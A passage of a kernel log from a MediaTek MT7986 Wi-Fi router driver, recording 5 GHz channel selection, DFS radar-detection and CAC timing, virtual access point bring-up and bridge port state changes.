prim_ch(36), cen_ch_1(50), cen_ch_2(0),ext_cha(1), vht_bw(2)! [ 32.104272] 7986@C00L1rax0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(3), prim_ch(36), cen_ch_1(50), cen_ch_2(0), vht_bw(2)! [ 32.104275] WiFi@C02L1,hc_radio_res_request() 1418: wdev=13, hobj is not ready! [ 32.104367] operate_loader_phy: vap rax6, (caller:wlan_operate_set_ht_bw+0x90/0x178 [mt7986b]) [ 32.104372] 7986@C23L1rax0,operate_loader_phy() 385: oper_cfg: prim_ch(36), ht_bw(1), extcha(1), vht_bw(2), cen_ch_2(0), PhyMode=177! [ 32.104376] 7986@C23L1rax0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(3), prim_ch(36), cen_ch_1(50), cen_ch_2(0),ext_cha(1), vht_bw(2)! [ 32.104386] 7986@C00L1rax0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(3), prim_ch(36), cen_ch_1(50), cen_ch_2(0), vht_bw(2)! [ 32.104389] WiFi@C02L1,hc_radio_res_request() 1418: wdev=14, hobj is not ready! [ 32.104542] 7986@C23L1rax0,Set_Channel_Proc() 1796: Channel(0), Cert(0), Quick(1) [ 32.104669] 7986@C23L1rax0,rtmp_set_channel() 3007: (caller:Set_Channel_Proc+0x180/0x4f8 [mt7986b]), Channel(0), quick_ch_change:1. [ 32.104673] 7986@C12L1rax0,rtmp_set_channel() 3032: rtmp_set_channel: return by pDot11h=NULL [ 32.104708] Set_Channel_Proc: successfully update channel to 0 [ 32.104801] [mtf_txpower_all_rate_info] band_idx:1 pwr:53 ChBand:5G ePAGain:0 [ 32.104927] MtCmdSetMuruCfgDlUlVal: u1BandBssSelect:0 u1Index:1 ParamUpdList:4 ParamUpdVal:4 [ 32.105034] MtCmdSetMuruCfgDlUlVal: u1BandBssSelect:0 u1Index:1 ParamUpdList:3 ParamUpdVal:0 [ 32.111127] [wps]wpsImple_SetWpsInProgress_Proc: IF-ra00 trigger wps mode from 0 to 0. [ 32.132064] [wps]wpsImple_SetWpsInProgress_Proc: IF-ra08 trigger wps mode from 0 to 0. [ 32.145066] device rax0 left promiscuous mode [ 32.145152] br-lan: port 9(rax0) entered disabled state [ 32.186378] 7986@C08L1rax0,UpdateBeaconHandler() 2060: wdev(8) bss not ready (state:0, caller:ioctlStopVap+0xec/0x190 [mt7986b])!! [ 32.186685] 7986@C15L1rax0,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=8, Desired MFPC=0 [ 32.186899] Disable vap 8 rate limit [ 32.186906] IF(ra8) Set_BWRateLimitType_Proc::(iv_ml_type_bw=0) [ 32.187171] Set_FragThreshold_Proc::set wdev8 FragThreshold=2346) [ 32.187218] Set_RTSThreshold_Proc: set wdev8 rts length threshold=2347(0x92b) [ 32.189800] Set_MgntFrameRate_Proc::(MgntFrameRate For EAPOL|ARP|DHCP 5G ILLEGAL) [ 32.190157] 7986@C08L1rax0,UpdateBeaconHandler() 2060: wdev(8) bss not ready (state:0, caller:APStopByBss+0xe8/0x410 [mt7986b])!! [ 32.190739] operate_loader_phy: vap rax0, (caller:wlan_operate_init+0xa4/0x120 [mt7986b]) [ 32.190747] 7986@C23L1rax0,operate_loader_phy() 385: oper_cfg: prim_ch(0), ht_bw(1), extcha(1), vht_bw(2), cen_ch_2(0), PhyMode=177! [ 32.190782] WiFi@C12L1,wifi_sys_open() 898: wifi_sys_open():band1 group_idx[8]=4, bw_grp=16 omac=0 [ 32.193977] 7986@C23L1rax0,HcGetBandByChannel() 1102: No hdev parking on channel:0, just return a default band_idx 0! [ 32.194608] 7986@C03L1rax0,MtCmdSetMacTxRx() 10289: (ret = 0) [ 32.194721] 7986@C03L1rax0,MtCmdSetMacTxRx() 10289: (ret = 0) [ 32.194918] 7986@C08L1rax0,UpdateBeaconHandler() 2060: wdev(8) bss not ready (state:0, caller:MTAPAutoSelectChannel+0x108/0x490 [mt7986b])!! [ 32.194972] MtCmdChannelSwitch: set ucBW=0 & ucAPBW=0 , central=36 [ 32.226823] MtCmdSetTxRxPath: set ucBW=0 & ucAPBW=0 , central=36, ControlChannel=36, IS_ADJ_BW_ZERO_WAIT_TX80RX160=0 [ 32.232154] WiFi@C00L1,RcUpdateChannel() 882: RcUpdateChannel: pRadioCtrl→Channel, orig_chan=36, new_chan=36 [ 32.438064] MtCmdChannelSwitch: set ucBW=0 & ucAPBW=0 , central=40 [ 32.469933] MtCmdSetTxRxPath: set ucBW=0 & ucAPBW=0 , central=40, ControlChannel=40, IS_ADJ_BW_ZERO_WAIT_TX80RX160=0 [ 32.475095] WiFi@C00L1,RcUpdateChannel() 882: RcUpdateChannel: pRadioCtrl→Channel, orig_chan=36, new_chan=40 [ 32.682034] MtCmdChannelSwitch: set ucBW=0 & ucAPBW=0 , central=44 [ 32.713865] MtCmdSetTxRxPath: set ucBW=0 & ucAPBW=0 , central=44, ControlChannel=44, IS_ADJ_BW_ZERO_WAIT_TX80RX160=0 [ 32.719039] WiFi@C00L1,RcUpdateChannel() 882: RcUpdateChannel: pRadioCtrl→Channel, orig_chan=40, new_chan=44 [ 32.926029] MtCmdChannelSwitch: set ucBW=0 & ucAPBW=0 , central=48 [ 32.957824] MtCmdSetTxRxPath: set ucBW=0 & ucAPBW=0 , central=48, ControlChannel=48, IS_ADJ_BW_ZERO_WAIT_TX80RX160=0 [ 32.963211] WiFi@C00L1,RcUpdateChannel() 882: RcUpdateChannel: pRadioCtrl→Channel, orig_chan=44, new_chan=48 [ 33.170150] 7986@C08L1rax0,UpdateBeaconHandler() 2060: wdev(8) bss not ready (state:0, caller:MTAPAutoSelectChannel+0x2d0/0x490 [mt7986b])!! [ 33.170168] 7986@C00L0rax0,ApAutoChannelAtBootUp() 358: Auto channel selection: Selected channel = 40, IsAband = 1 [ 33.170173] 7986@C12L1rax0,ApAutoChannelAtBootUp() 409: ApAutoChannelAtBootUp: ZWDFS set meshZeroWaitBackChannel=40 [ 33.170179] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1185: Adj_ZeroWait_Status_Update: ---→ vap rax0, channel=40, vht_bw=2, OutBandBw=2 [ 33.170182] 7986@C12L1rax0,tpDfsCacValidCheck() 1015: tpDfsCacValidCheck: bDfsCacValid=FALSE, just return FALSE [ 33.170186] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1194: Adj_ZeroWait_Status_Update: bSkipCac=0 [ 33.170190] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1245: Adj_ZeroWait_Status_Update: vht_bw=VHT_BW_160, set BW160ZeroWaitState=DFS_BW160_TX80RX160 [ 33.170193] 7986@C00L1rax0,tpDfsSelectChannelByChannel() 5362: DFS select channel by inputChannel=40 [ 33.170198] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1396: Adj_ZeroWait_Status_Update: set rax0 vht_bw=1, VHT_BW_80(1) [ 33.170202] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1414: Adj_ZeroWait_Status_Update: set band_idx 1 CAC Count to 0 [ 33.170206] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1396: Adj_ZeroWait_Status_Update: set rax1 vht_bw=1, VHT_BW_80(1) [ 33.170209] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1414: Adj_ZeroWait_Status_Update: set band_idx 1 CAC Count to 0 [ 33.170213] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1396: Adj_ZeroWait_Status_Update: set rax2 vht_bw=1, VHT_BW_80(1) [ 33.170216] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1414: Adj_ZeroWait_Status_Update: set band_idx 1 CAC Count to 0 [ 33.170220] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1396: Adj_ZeroWait_Status_Update: set rax3 vht_bw=1, VHT_BW_80(1) [ 33.170224] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1414: Adj_ZeroWait_Status_Update: set band_idx 1 CAC Count to 0 [ 33.170227] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1396: Adj_ZeroWait_Status_Update: set rax4 vht_bw=1, VHT_BW_80(1) [ 33.170231] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1414: Adj_ZeroWait_Status_Update: set band_idx 1 CAC Count to 0 [ 33.170235] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1396: Adj_ZeroWait_Status_Update: set rax5 vht_bw=1, VHT_BW_80(1) [ 33.170238] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1414: Adj_ZeroWait_Status_Update: set band_idx 1 CAC Count to 0 [ 33.170242] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1396: Adj_ZeroWait_Status_Update: set rax6 vht_bw=1, VHT_BW_80(1) [ 33.170245] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1414: Adj_ZeroWait_Status_Update: set band_idx 1 CAC Count to 0 [ 33.170249] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1396: Adj_ZeroWait_Status_Update: set rax7 vht_bw=1, VHT_BW_80(1) [ 33.170252] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1414: Adj_ZeroWait_Status_Update: set band_idx 1 CAC Count to 0 [ 33.170256] 7986@C12L1rax0,Adj_ZeroWait_Status_Update() 1429: Adj_ZeroWait_Status_Update: ←------ ZWDFS actual channel=40 [ 33.170258] [RadarStateCheck] Zero Wait State: 2 [ 33.170391] operate_loader_phy: vap rax0, (caller:wlan_operate_set_prim_ch+0x3c/0x50 [mt7986b]) [ 33.170396] 7986@C23L1rax0,operate_loader_phy() 385: oper_cfg: prim_ch(40), ht_bw(1), extcha(1), vht_bw(1), cen_ch_2(0), PhyMode=177! [ 33.170405] 7986@C23L1rax0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(2), prim_ch(40), cen_ch_1(42), cen_ch_2(0),ext_cha(3), vht_bw(1)! [ 33.170420] 7986@C00L1rax0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(2), prim_ch(40), cen_ch_1(42), cen_ch_2(0), vht_bw(1)! [ 33.170424] 7986@C23L1rax0,DfsCacNormalStart() 3946: DfsCacNormalStart: CAC Start, band_idx=1. [ 33.170428] 7986@C08L1rax0,DfsCacNormalStart() 3970: [RDM] TX80/RX160 mode, CAC 65 seconds start [ 33.170431] 7986@C23L1rax0,DfsCacNormalStart() 3989: [RDM] Normal start. Enable MAC TX [ 33.170492] MtCmdChannelSwitch: set ucBW & ucAPBW as BW_160, central 50 [ 33.170494] MtCmdChannelSwitch: set ucBW=3 & ucAPBW=3 , central=50 [ 33.403274] MtCmdSetTxRxPath: set ucBW & ucAPBW as BW_160, central 50 [ 33.403281] MtCmdSetTxRxPath: set ucBW=3 & ucAPBW=3 , central=50, ControlChannel=40, IS_ADJ_BW_ZERO_WAIT_TX80RX160=1 [ 33.408956] WiFi@C00L1,RcUpdateChannel() 882: RcUpdateChannel: pRadioCtrl→Channel, orig_chan=48, new_chan=40 [ 33.408967] 7986@C23L1rax0,DfsCacNormalStart() 3946: DfsCacNormalStart: CAC Start, band_idx=1. [ 33.408971] 7986@C08L1rax0,DfsCacNormalStart() 3970: [RDM] TX80/RX160 mode, CAC 65 seconds start [ 33.408975] 7986@C23L1rax0,DfsCacNormalStart() 3989: [RDM] Normal start. Enable MAC TX [ 33.408986] 7986@C23L1rax0,WrapDfsRadarDetectStart() 6728: [RDM]: band_ch[0]: 0, band_ch[1]: 40 [ 33.408989] 7986@C23L1rax0,WrapDfsRadarDetectStart() 6731: [RDM]: DfsChBand[0]: 0, DfsChBand[1]: 1 [ 33.408993] 7986@C23L1rax0,WrapDfsRadarDetectStart() 6735: [RDM] BandIdx: 1, BW: 2, RDMode: 0 [ 33.408997] 7986@C08L1rax0,DfsRadarDetectStart() 6807: [RDM]: start RDD [ 33.409019] ApAutoChannelAtBootUp←---------------- [ 33.409256] 7986@C08L1rax0,UpdateBeaconHandler() 2060: wdev(8) bss not ready (state:0, caller:MlmeUpdateTxRates+0x7c/0xef8 [mt7986b])!! [ 33.455947] Allocate ObjIdx:8 WmmIdx:1 [ 33.470622] PrintSrCmd: [ 33.470622] u1CmdSubId = 1, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 33.470622] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 33.470631] PrintSrCmd: [ 33.470631] u1CmdSubId = 5, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 33.470631] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 33.470639] PrintSrCmd: [ 33.470639] u1CmdSubId = 3, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 33.470639] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 33.470645] PrintSrCmd: [ 33.470645] u1CmdSubId = 23, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 33.470645] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 33.470651] PrintSrCmd: [ 33.470651] u1CmdSubId = 31, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 33.470651] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 33.470657] PrintSrCmd: [ 33.470657] u1CmdSubId = 33, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 33.470657] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 33.470691] Main bssid = ec:60:73:c5:40:ec [ 33.470895] br-lan: port 7(rax0) entered blocking state [ 33.470897] br-lan: port 7(rax0) entered disabled state [ 33.471055] device rax0 entered promiscuous mode [ 33.471101] br-lan: port 7(rax0) entered blocking state [ 33.471105] br-lan: port 7(rax0) entered forwarding state [ 33.471668] [mtf_txpower_all_rate_info] band_idx:1 pwr:53 ChBand:5G ePAGain:0 [ 33.473005] device rax7 left promiscuous mode [ 33.473045] br-lan: port 10(rax7) entered disabled state [ 33.492172] 7986@C08L1rax7,UpdateBeaconHandler() 2060: wdev(15) bss not ready (state:0, caller:ioctlStopVap+0xec/0x190 [mt7986b])!! [ 33.493258] 7986@C15L1rax7,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=15, Desired MFPC=0 [ 33.493597] Disable vap 15 rate limit [ 33.493603] IF(ra15) Set_BWRateLimitType_Proc::(iv_ml_type_bw=0) [ 33.493994] Set_FragThreshold_Proc::set wdev15 FragThreshold=2346) [ 33.494077] Set_RTSThreshold_Proc: set wdev15 rts length threshold=2347(0x92b) [ 33.495850] Set_MgntFrameRate_Proc::(MgntFrameRate For EAPOL|ARP|DHCP 5G ILLEGAL) [ 33.496192] 7986@C08L1rax7,UpdateBeaconHandler() 2060: wdev(15) bss not ready (state:0, caller:APStopByBss+0xe8/0x410 [mt7986b])!! [ 33.496644] operate_loader_phy: vap rax7, (caller:wlan_operate_init+0xa4/0x120 [mt7986b]) [ 33.496652] 7986@C23L1rax7,operate_loader_phy() 385: oper_cfg: prim_ch(40), ht_bw(1), extcha(1), vht_bw(1), cen_ch_2(0), PhyMode=177! [ 33.496661] 7986@C23L1rax7,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(2), prim_ch(40), cen_ch_1(42), cen_ch_2(0),ext_cha(3), vht_bw(1)! [ 33.496678] 7986@C00L1rax7,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(2), prim_ch(40), cen_ch_1(42), cen_ch_2(0), vht_bw(1)! [ 33.496683] 7986@C23L1rax7,DfsCacNormalStart() 3946: DfsCacNormalStart: CAC Start, band_idx=1. [ 33.496688] 7986@C08L1rax7,DfsCacNormalStart() 3970: [RDM] TX80/RX160 mode, CAC 65 seconds start [ 33.496692] 7986@C23L1rax7,DfsCacNormalStart() 3989: [RDM] Normal start. Enable MAC TX [ 33.496743] MtCmdChannelSwitch: set ucBW & ucAPBW as BW_160, central 50 [ 33.496745] MtCmdChannelSwitch: set ucBW=3 & ucAPBW=3 , central=50 [ 33.503112] MtCmdSetTxRxPath: set ucBW & ucAPBW as BW_160, central 50 [ 33.503119] MtCmdSetTxRxPath: set ucBW=3 & ucAPBW=3 , central=50, ControlChannel=40, IS_ADJ_BW_ZERO_WAIT_TX80RX160=1 [ 33.508984] WiFi@C00L1,RcUpdateChannel() 882: RcUpdateChannel: pRadioCtrl→Channel, orig_chan=40, new_chan=40 [ 33.508996] 7986@C23L1rax7,DfsCacNormalStart() 3946: DfsCacNormalStart: CAC Start, band_idx=1. [ 33.509001] 7986@C08L1rax7,DfsCacNormalStart() 3970: [RDM] TX80/RX160 mode, CAC 65 seconds start [ 33.509005] 7986@C23L1rax7,DfsCacNormalStart() 3989: [RDM] Normal start. Enable MAC TX [ 33.509016] 7986@C23L1rax7,WrapDfsRadarDetectStart() 6728: [RDM]: band_ch[0]: 0, band_ch[1]: 40 [ 33.509019] 7986@C23L1rax7,WrapDfsRadarDetectStart() 6731: [RDM]: DfsChBand[0]: 0, DfsChBand[1]: 1 [ 33.509023] 7986@C23L1rax7,WrapDfsRadarDetectStart() 6735: [RDM] BandIdx: 1, BW: 2, RDMode: 0 [ 33.509027] 7986@C08L1rax7,DfsRadarDetectStart() 6807: [RDM]: start RDD [ 33.509059] WiFi@C12L1,wifi_sys_open() 898: wifi_sys_open():band1 group_idx[15]=25, bw_grp=16 omac=17 [ 33.513197] 7986@C03L1rax7,MtCmdSetMacTxRx() 10289: (ret = 0) [ 33.513304] 7986@C03L1rax7,MtCmdSetMacTxRx() 10289: (ret = 0) [ 33.513309] 7986@C00L1rax7,tpDfsSelectChannelByChannel() 5362: DFS select channel by inputChannel=40 [ 33.513319] [RadarStateCheck] Zero Wait State: 2 [ 33.513531] operate_loader_phy: vap rax7, (caller:wlan_operate_set_prim_ch+0x3c/0x50 [mt7986b]) [ 33.513536] 7986@C23L1rax7,operate_loader_phy() 385: oper_cfg: prim_ch(40), ht_bw(1), extcha(1), vht_bw(1), cen_ch_2(0), PhyMode=177! [ 33.513545] 7986@C23L1rax7,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(2), prim_ch(40), cen_ch_1(42), cen_ch_2(0),ext_cha(3), vht_bw(1)! [ 33.513561] 7986@C00L1rax7,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(2), prim_ch(40), cen_ch_1(42), cen_ch_2(0), vht_bw(1)! [ 33.513567] 7986@C23L1rax7,DfsCacNormalStart() 3946: DfsCacNormalStart: CAC Start, band_idx=1. [ 33.513572] 7986@C08L1rax7,DfsCacNormalStart() 3970: [RDM] TX80/RX160 mode, CAC 65 seconds start [ 33.513575] 7986@C23L1rax7,DfsCacNormalStart() 3989: [RDM] Normal start. Enable MAC TX [ 33.513627] MtCmdChannelSwitch: set ucBW & ucAPBW as BW_160, central 50 [ 33.513629] MtCmdChannelSwitch: set ucBW=3 & ucAPBW=3 , central=50 [ 33.519647] MtCmdSetTxRxPath: set ucBW & ucAPBW as BW_160, central 50 [ 33.519654] MtCmdSetTxRxPath: set ucBW=3 & ucAPBW=3 , central=50, ControlChannel=40, IS_ADJ_BW_ZERO_WAIT_TX80RX160=1 [ 33.525128] WiFi@C00L1,RcUpdateChannel() 882: RcUpdateChannel: pRadioCtrl→Channel, orig_chan=40, new_chan=40 [ 33.525169] 7986@C23L1rax7,DfsCacNormalStart() 3946: DfsCacNormalStart: CAC Start, band_idx=1. [ 33.525175] 7986@C08L1rax7,DfsCacNormalStart() 3970: [RDM] TX80/RX160 mode, CAC 65 seconds start [ 33.525185] 7986@C23L1rax7,DfsCacNormalStart() 3989: [RDM] Normal start. Enable MAC TX [ 33.525217] 7986@C23L1rax7,WrapDfsRadarDetectStart() 6728: [RDM]: band_ch[0]: 0, band_ch[1]: 40 [ 33.525222] 7986@C23L1rax7,WrapDfsRadarDetectStart() 6731: [RDM]: DfsChBand[0]: 0, DfsChBand[1]: 1 [ 33.525225] 7986@C23L1rax7,WrapDfsRadarDetectStart() 6735: [RDM] BandIdx: 1, BW: 2, RDMode: 0 [ 33.525238] 7986@C08L1rax7,DfsRadarDetectStart() 6807: [RDM]: start RDD [ 33.525307] ApAutoChannelAtBootUp←---------------- [ 33.526252] 7986@C08L1rax7,UpdateBeaconHandler() 2060: wdev(15) bss not ready (state:0, caller:MlmeUpdateTxRates+0x7c/0xef8 [mt7986b])!! [ 33.573913] Allocate ObjIdx:15 WmmIdx:1 [ 33.589145] PrintSrCmd: [ 33.589145] u1CmdSubId = 1, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 33.589145] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 33.589155] PrintSrCmd: [ 33.589155] u1CmdSubId = 5, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 33.589155] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 33.589163] PrintSrCmd: [ 33.589163] u1CmdSubId = 3, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 33.589163] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 33.589169] PrintSrCmd: [ 33.589169] u1CmdSubId = 23, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 33.589169] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 33.589175] PrintSrCmd: [ 33.589175] u1CmdSubId = 31, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 33.589175] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 33.589180] PrintSrCmd: [ 33.589180] u1CmdSubId = 33, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 33.589180] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 33.589217] Main bssid = ec:60:73:c5:40:ec [ 33.589298] br-lan: port 8(rax7) entered blocking state [ 33.589301] br-lan: port 8(rax7) entered disabled state [ 33.589436] device rax7 entered promiscuous mode [ 33.589474] br-lan: port 8(rax7) entered blocking state [ 33.589477] br-lan: port 8(rax7) entered forwarding state [ 33.590095] [mtf_txpower_all_rate_info] band_idx:1 pwr:53 ChBand:5G ePAGain:0 [ 33.591257] device apclix0 left promiscuous mode [ 33.591294] br-lan: port 11(apclix0) entered disabled state [ 33.607663] 7986@C09L1apclix0,ApCliIfDown() 2100: [MESH_SR]ApCliIfDown - ApCli interface[0] start down & resume SR [ 33.607669] 7986@C09L1apclix0,ApCliIfDown() 2100: [MESH_SR]ApCliIfDown - ApCli interface[1] start down & resume SR [ 33.607821] 7986@C12L1apclix0,Set_ApCliPMFMFPC_Proc() 2003: [PMF]: MFPC=0, MFPR=0, SHA256=0 [ 33.607846] 7986@C12L1apclix0,Set_ApCliPMFMFPR_Proc() 2067: [PMF]: MFPC=0, MFPR=0, SHA256=0 [ 33.607859] 7986@C08L0apclix0,a4_interface_deinit() 155: a4_interface_init a4_interface_count: 2 [ 33.613479] [wps]wpsImple_SetWpsInProgress_Proc: IF-ra00 trigger wps mode from 0 to 0. [ 33.637889] [wps]wpsImple_SetWpsInProgress_Proc: IF-ra08 trigger wps mode from 0 to 0. [ 34.052177] 7986@C08L1ra7,UpdateBeaconHandler() 2060: wdev(1) bss not ready (state:0, caller:meshImple_UpdateFhBeacon+0x74/0xa0 [mt7986b])!! [ 34.065430] [MESH]set almac to ec:60:73:c5:40:ec [ 95.494685] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 100.104192] start write config partition...partition_offset is 0x1c0000, size = 0x10000 [ 103.262100] 7986@C23L1rax0,DfsCacEndUpdate() 3403: [RDM] CAC end. Enable MAC TX. [ 103.269502] 7986@C12L1rax0,DfsCacEndUpdate() 3436: DfsCacEndUpdate: OutBandVhtBw=2 (VHT_BW80=1), OutBandHtBw=1, NewBw=3 (BW_80=2) [ 103.281131] 7986@C12L1rax0,DfsCacEndUpdate() 3467: DfsCacEndUpdate: ZWDFS use meshZeroWaitBackChannel=40 as back channel [ 103.291980] 7986@C12L1rax0,DfsCacEndUpdate() 3481: DfsCacEndUpdate: exec DfsAdjustBwSetting with NewBw=3 (BW_80=2) [ 103.302314] 7986@C12L1rax0,DfsCacEndUpdate() 3553: DfsCacEndUpdate: ZWDFS set bDfsCacValid=1, record prevVhtBw=2 (VHT_BW_80=1), prevHtBw=1 (BW_40=1) [ 103.315585] 7986@C12L1rax0,DfsCacEndUpdate() 3585: DfsCacEndUpdate: set BW160ZeroWaitState=DFS_BW160_TX160RX160 [ 103.325651] 7986@C12L1rax0,DfsCacEndUpdate() 3467: DfsCacEndUpdate: ZWDFS use meshZeroWaitBackChannel=40 as back channel [ 103.325840] 7986@C23L1rax0,perform_channel_change() 2681: (caller:DfsChannelSwitchTimeoutAction+0x98/0x1a8 [mt7986b]), Channel(40), quick_ch_change:1. [ 103.336511] 7986@C12L1rax0,DfsCacEndUpdate() 3481: DfsCacEndUpdate: exec DfsAdjustBwSetting with NewBw=3 (BW_80=2) [ 103.336520] 7986@C12L1rax0,DfsCacEndUpdate() 3467: DfsCacEndUpdate: ZWDFS use meshZeroWaitBackChannel=40 as back channel [ 103.336534] 7986@C12L1rax0,DfsCacEndUpdate() 3481: DfsCacEndUpdate: exec DfsAdjustBwSetting with NewBw=3 (BW_80=2) [ 103.350065] WiFi@C08L1,bss_update_offload_bcn_csa() 4165: bss_update_offload_bcn_csa, BSS(1), UpdateReason(8), CsaCount = 5 [ 103.360296] 7986@C12L1rax0,DfsCacEndUpdate() 3467: DfsCacEndUpdate: ZWDFS use meshZeroWaitBackChannel=40 as back channel [ 103.381735] WiFi@C08L1,bss_update_offload_bcn_csa() 4165: bss_update_offload_bcn_csa, BSS(3), UpdateReason(8), CsaCount = 5 [ 103.392598] 7986@C12L1rax0,DfsCacEndUpdate() 3481: DfsCacEndUpdate: exec DfsAdjustBwSetting with NewBw=3 (BW_80=2) [ 103.424872] 7986@C12L1rax0,DfsCacEndUpdate() 3467: DfsCacEndUpdate: ZWDFS use meshZeroWaitBackChannel=40 as back channel [ 103.435723] 7986@C12L1rax0,DfsCacEndUpdate() 3481: DfsCacEndUpdate: exec DfsAdjustBwSetting with NewBw=3 (BW_80=2) [ 103.446080] 7986@C12L1rax0,DfsCacEndUpdate() 3467: DfsCacEndUpdate: ZWDFS use meshZeroWaitBackChannel=40 as back channel [ 103.456939] 7986@C12L1rax0,DfsCacEndUpdate() 3481: DfsCacEndUpdate: exec DfsAdjustBwSetting with NewBw=3 (BW_80=2) [ 103.467282] 7986@C12L1rax0,DfsCacEndUpdate() 3467: DfsCacEndUpdate: ZWDFS use meshZeroWaitBackChannel=40 as back channel [ 103.478134] 7986@C12L1rax0,DfsCacEndUpdate() 3481: DfsCacEndUpdate: exec DfsAdjustBwSetting with NewBw=3 (BW_80=2) [ 103.488474] 7986@C12L1rax0,DfsCacEndUpdate() 3467: DfsCacEndUpdate: ZWDFS use meshZeroWaitBackChannel=40 as back channel [ 103.499324] 7986@C12L1rax0,DfsCacEndUpdate() 3481: DfsCacEndUpdate: exec DfsAdjustBwSetting with NewBw=3 (BW_80=2) [ 103.509662] 7986@C12L1rax0,DfsCacEndUpdate() 3523: DfsCacEndUpdate: force kick out BH Sta [ 103.517928] 7986@C12L1rax0,DfsCacEndUpdate() 3553: DfsCacEndUpdate: ZWDFS set bDfsCacValid=1, record prevVhtBw=2 (VHT_BW_80=1), prevHtBw=1 (BW_40=1) [ 103.531391] 7986@C23L1rax0,perform_channel_change() 2681: (caller:DfsChannelSwitchTimeoutAction+0x98/0x1a8 [mt7986b]), Channel(40), quick_ch_change:1. [ 103.544980] WiFi@C08L1,bss_update_offload_bcn_csa() 4165: bss_update_offload_bcn_csa, BSS(1), UpdateReason(8), CsaCount = 5 [ 103.556274] WiFi@C08L1,bss_update_offload_bcn_csa() 4165: bss_update_offload_bcn_csa, BSS(3), UpdateReason(8), CsaCount = 5 [ 104.018235] 7986@C12L1rax0,Dot11HCntDownTimeoutAction() 559: Dot11HCntDownTimeoutAction: force kick out BH Sta [ 104.028530] 7986@C03L1rax0,ExtEventBeaconLostHandler() 176: AP Beacon OFF!!! [ 104.035889] 7986@C03L1rax0,ExtEventBeaconLostHandler() 176: AP Beacon OFF!!! [ 104.052807] 7986@C13L1rax0,ap_phy_rrm_init_byRf() 2147: Wlan_operate_init and switch channel for : rax0 [ 104.062192] [RadarStateCheck] Zero Wait State: 1 [ 104.066986] operate_loader_phy: vap rax0, (caller:wlan_operate_init+0xa4/0x120 [mt7986b]) [ 104.075169] 7986@C23L1rax0,operate_loader_phy() 385: oper_cfg: prim_ch(40), ht_bw(1), extcha(1), vht_bw(2), cen_ch_2(0), PhyMode=177! [ 104.087170] 7986@C23L1rax0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(3), prim_ch(40), cen_ch_1(50), cen_ch_2(0),ext_cha(3), vht_bw(2)! [ 104.102014] 7986@C00L1rax0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(3), prim_ch(40), cen_ch_1(50), cen_ch_2(0), vht_bw(2)! [ 104.116248] 7986@C23L1rax0,DfsCacNormalStart() 3946: DfsCacNormalStart: CAC Start, band_idx=1. [ 104.124842] 7986@C23L1rax0,DfsCacNormalStart() 3989: [RDM] Normal start. Enable MAC TX [ 104.132870] MtCmdChannelSwitch: set ucBW=3 & ucAPBW=0 , central=50 [ 104.144204] MtCmdSetTxRxPath: set ucBW=3 & ucAPBW=0 , central=50, ControlChannel=40, IS_ADJ_BW_ZERO_WAIT_TX80RX160=0 [ 104.159908] WiFi@C00L1,RcUpdateChannel() 882: RcUpdateChannel: pRadioCtrl→Channel, orig_chan=40, new_chan=40 [ 104.169812] 7986@C23L1rax0,DfsCacNormalStart() 3946: DfsCacNormalStart: CAC Start, band_idx=1. [ 104.178403] 